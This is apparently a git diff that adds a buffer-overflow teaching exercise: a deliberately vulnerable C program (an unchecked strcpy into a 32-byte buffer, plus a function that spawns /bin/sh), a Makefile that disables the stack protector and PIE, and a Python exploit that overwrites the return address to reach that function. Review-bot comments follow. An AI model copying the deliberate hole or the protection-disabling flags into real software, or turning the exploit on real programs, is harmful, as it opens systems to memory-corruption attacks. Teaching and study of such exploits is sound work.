| -rw-r--r-- | .gitignore | 1 | ||||
| -rw-r--r-- | Makefile | 13 | ||||
| -rwxr-xr-x | exploit.py | 14 | ||||
| -rw-r--r-- | vuln.c | 25 |
4 files changed, 53 insertions, 0 deletions
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..d8f7879
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1 @@
+vuln
diff --git a/Makefile b/Makefile
new file mode 100644
index 0000000..351c218
--- /dev/null
+++ b/Makefile
@@ -0,0 +1,13 @@
+CC = cc
+CFLAGS = -m32 -fno-stack-protector -no-pie -g
+WARNFLAGS = -Wno-deprecated-declarations -Wno-stringop-overflow
+SRC = vuln.c
+TARGET = vuln
+
+all: $(TARGET)
+
+$(TARGET): $(SRC)
+ $(CC) $(CFLAGS) $(WARNFLAGS) -o $(TARGET) $(SRC)
+
+clean:
+ rm -f $(TARGET)
diff --git a/exploit.py b/exploit.py
new file mode 100755
index 0000000..6ec37e5
--- /dev/null
+++ b/exploit.py
@@ -0,0 +1,14 @@
+#!/usr/bin/env python3
+import subprocess
+
+print("locating address of unused_function...")
+objdump_output = subprocess.check_output(['objdump', '-d', './vuln'], text=True)
+for line in objdump_output.split('\n'):
+ if '<unused_function>:' in line:
+ address_hex = line.split()[0]
+ address_bytes = bytes.fromhex(address_hex)[::-1]
+ print(f"found address (little endian): {str(address_bytes)}")
+ break
+
+payload = b'A' * 44 + address_bytes
+subprocess.run(["./vuln", payload])
@@ -0,0 +1,25 @@
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+
+void unused_function() {
+ printf("you did it! ROP achieved, we never call this function\n");
+ printf("calling /bin/sh...\n");
+ system("/bin/sh");
+}
+
+void vuln(char* input) {
+ char buffer[32];
+ // copy input but dont check size, purposefully vulnerable so we can ROP our way through stuff
+ strcpy(buffer, input);
+ printf("Your argument was: %s\n", buffer);
+}
+
+int main(int argc, char** argv) {
+ if (argc != 2) {
+ printf("Usage: %s <string>\n", argv[0]);
+ return 1;
+ }
+ vuln(argv[1]);
+ return 0;
+} |
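Review bot: Nothing in the Makefile says that `-fno-stack-protector`, `-no-pie` and the two `-Wno-...` suppressions are deliberate, so the CFLAGS and WARNFLAGS lines read like ordinary build settings. A comment above them, for example `# Exercise build: stack protector and PIE are off and the overflow warning is silenced on purpose`, would document the intent. `all` and `clean` are also not declared phony; adding `.PHONY: all clean` keeps a stray file named `clean` from turning `make clean` into a no-op.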
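Review bot: `address_bytes` is assigned only inside the `if '<unused_function>:' in line` branch, so when that symbol is absent from the objdump output the script stops with a NameError at the `payload = ...` line rather than a message that says what went wrong. An `else:` clause on the `for` loop with `raise SystemExit("unused_function not found in ./vuln; run make first")` would make the failure explicit. The literal `44` is also unexplained; it presumably depends on the stack layout produced by this Makefile's flags, and a one-line comment saying so would help whoever rebuilds with a different compiler.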
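Review bot: The comment above `strcpy(buffer, input)` says the copy is unchecked but not what the checked form looks like, which is the part a reader of a teaching sample needs; it could be extended with the bounded alternative, e.g. `// safe form: snprintf(buffer, sizeof buffer, "%s", input);`. The comment and the message in `unused_function` call this ROP, while the sample as shown overwrites a single saved return address to reach an existing function, so wording it that way would be more accurate. `void unused_function()` should be `void unused_function(void)` so the declaration is a real prototype in C.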
